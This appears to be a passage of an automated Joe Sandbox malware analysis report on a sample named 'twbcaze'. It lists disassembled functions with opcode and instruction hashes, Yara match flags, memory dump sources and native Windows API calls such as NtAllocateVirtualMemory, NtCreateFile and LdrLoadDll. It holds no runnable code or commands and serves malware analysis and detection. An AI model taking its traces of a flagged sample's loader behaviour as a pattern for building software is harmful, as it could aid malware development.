                                          • Instruction ID: 426e22e72354b292b0491fa63b07e3ad4342c56be0c17f4280f2a8b488479637
                                          • Opcode Fuzzy Hash: 30c31e43d8885961e1ee9a641670382ed8a5f0ed8d9ae32863fd0d8a5714705e
                                          • Instruction Fuzzy Hash: EB119CB4612308DAD709EF16FA416403BE4BF18300F10B27AE828973A0E3F4A6419B9D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00404582
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 004045CC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: std::_$Locinfo::_Locinfo_dtorLockitLockit::~_
                                          • String ID: BC@
                                          • API String ID: 3286764726-567795178
                                          • Opcode ID: 21a45f711aed31e2aa7e50a17d51986dc539f98cd72672fdc948f4672179dd05
                                          • Instruction ID: 30101b0a74aadc53a2af31f829cf8ca0d7754302c5aa35f51ee0d95304b8e84e
                                          • Opcode Fuzzy Hash: 21a45f711aed31e2aa7e50a17d51986dc539f98cd72672fdc948f4672179dd05
                                          • Instruction Fuzzy Hash: FDF0F970914108ABCB08FFA9E5A176DBB75AFC430CF44047ED646773C2DA38AAA09759
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 004041E4
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0040420F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                          • String ID: P@@
                                          • API String ID: 593203224-358152503
                                          • Opcode ID: 723069e1172fbba5e3a5e2abb35d6cb8eeda4d52ad1c98415e35d9cc6dbfd666
                                          • Instruction ID: c631f8bb44a1fe621ce2e9bf2f5b6246a9635cf2995841f609c86c8e23acef46
                                          • Opcode Fuzzy Hash: 723069e1172fbba5e3a5e2abb35d6cb8eeda4d52ad1c98415e35d9cc6dbfd666
                                          • Instruction Fuzzy Hash: 7EF034B0E00108DFDB04EFA9E541BACB7F0FF08304F0004AAE815AB3A1D3746A94CB49
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • AcquireSRWLockExclusive.KERNEL32(00432638,?,?,?,00402AF5,?,?,00402A88,?,004028C7), ref: 0040E147
                                          • ReleaseSRWLockExclusive.KERNEL32(00432638,?,?,?,00402AF5,?,?,00402A88,?,004028C7), ref: 0040E181
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExclusiveLock$AcquireRelease
                                          • String ID: 8&C
                                          • API String ID: 17069307-4180868660
                                          • Opcode ID: 91a97375c961c7277db80e4fd2ba5b8a695cbc517f5d1d5b28a7f96b48310684
                                          • Instruction ID: c7b64bba9b5cb3d732e833d916cabc7bf9407ba6fbd8089bec8ac7146b67c8bc
                                          • Opcode Fuzzy Hash: 91a97375c961c7277db80e4fd2ba5b8a695cbc517f5d1d5b28a7f96b48310684
                                          • Instruction Fuzzy Hash: C4F08C31201100DBC720AF26E804A6AB7A4EB49331F104A3FE9599B3E0C73858A3CA5A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:1.7%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:6.3%
                                          Total number of Nodes:555
                                          Total number of Limit Nodes:64

                                          Control-flow Graph

                                          control_flow_graph 0 41a3d0-41a419 call 41af20 NtReadFile
                                          APIs
                                          • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: !JA$bMA$bMA
                                          • API String ID: 2738559852-4222312340
                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                          • Instruction ID: 54437c4e75339082d0912fbe7e6c9053912bd6928cda1a9760da43cab1c95c7d
                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                          • Instruction Fuzzy Hash: C3F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241D630E8518BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 4 41a3ca-41a3cb 5 41a3da-41a419 call 41af20 NtReadFile 4->5 6 41a3cd-41a3ce 4->6 6->5
                                          APIs
                                          • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: !JA$bMA$bMA
                                          • API String ID: 2738559852-4222312340
                                          • Opcode ID: 795d799980d892d287fd9b8db69c775aa6b625beaafbfd55f1d0e140686c4f71
                                          • Instruction ID: ca327f79104fa82d58dc4a51924c6610fe60a23fd3e84f6a0e5d2587a75f1dee
                                          • Opcode Fuzzy Hash: 795d799980d892d287fd9b8db69c775aa6b625beaafbfd55f1d0e140686c4f71
                                          • Instruction Fuzzy Hash: 8FF0FEB2600108ABDB04DF99DC80EEB73ADEF8C718F158209FE1DA3241C634E8518BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 239 40ace0-40acfc 240 40ad04-40ad09 239->240 241 40acff call 41cc10 239->241 242 40ad0b-40ad0e 240->242 243 40ad0f-40ad1d call 41d030 240->243 241->240 246 40ad2d-40ad3e call 41b460 243->246 247 40ad1f-40ad2a call 41d2b0 243->247 252 40ad40-40ad54 LdrLoadDll 246->252 253 40ad57-40ad5a 246->253 247->246 252->253
                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                          • Instruction ID: 93036d1b31c8ba6342ae8de3f2893f5930aff37f33252288d1eb8296453bc5b5
                                          • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                          • Instruction Fuzzy Hash: FF015EB5E0020DABDB10EBA1DC42FDEB3789F14308F0041AAE908A7281F634EB54CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 270 41a320-41a371 call 41af20 NtCreateFile
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                          • Instruction ID: 30690d9e011530b668ed3b4ae7cc5c3fda29d367b226dbf4f68f65ca016a7565
                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                          • Instruction Fuzzy Hash: FDF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 273 41a500-41a53d call 41af20 NtAllocateVirtualMemory
                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                          • Instruction ID: c35769ceed384df61eeb5fc049e905e887b244236103aac277853e7772ac0dd9
                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                          • Instruction Fuzzy Hash: 75F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 282 41a44a-41a479 call 41af20 NtClose
                                          APIs
                                          • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 34d64a9403fb7a6a37e3297f96c8564be1be584d940cc82eb9b4c42dcb3ba971
                                          • Instruction ID: 66b807d11c52eaa30fa550aa3b1c1ef6ec778b7e68e66d63534a3927aaaed8be
                                          • Opcode Fuzzy Hash: 34d64a9403fb7a6a37e3297f96c8564be1be584d940cc82eb9b4c42dcb3ba971
                                          • Instruction Fuzzy Hash: E0E0C276200204BFDB20EFA4DC85FD77B28EF48324F104069BA1CDB242C530FA118B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 285 41a450-41a466 286 41a46c-41a479 NtClose 285->286 287 41a467 call 41af20 285->287 287->286
                                          APIs
                                          • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                          • Instruction ID: e48275ca6f7768b9f0fd4fab79f6d7fda959a909e55c262f35bdb2090c9231ed
                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                          • Instruction Fuzzy Hash: E5D01776200214ABD710EB99DC85EE77BADEF48764F15449ABA189B242C530FA1086E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                          • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                          • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                          • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                           Uniqueness
                                           • Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                           • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                          • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                          • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                          • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                           Uniqueness
                                           • Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                           • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                          • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                          • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                          • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                           Uniqueness
                                           • Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                           • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                          • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                          • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                          • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                           Uniqueness
                                           • Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                           • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                          • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                          • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                          • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                           Uniqueness
                                           • Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                           • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                          • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                          • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                          • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                           Uniqueness
                                           • Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                           • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                          • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                          • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                          • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                           Uniqueness
                                           • Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                           • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                          • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                          • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                          • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                           Uniqueness
                                           • Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                           • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                          • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                          • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                          • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                           Uniqueness
                                           • Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                           • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                          • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                          • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                          • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                           Uniqueness
                                           • Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                           • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmp
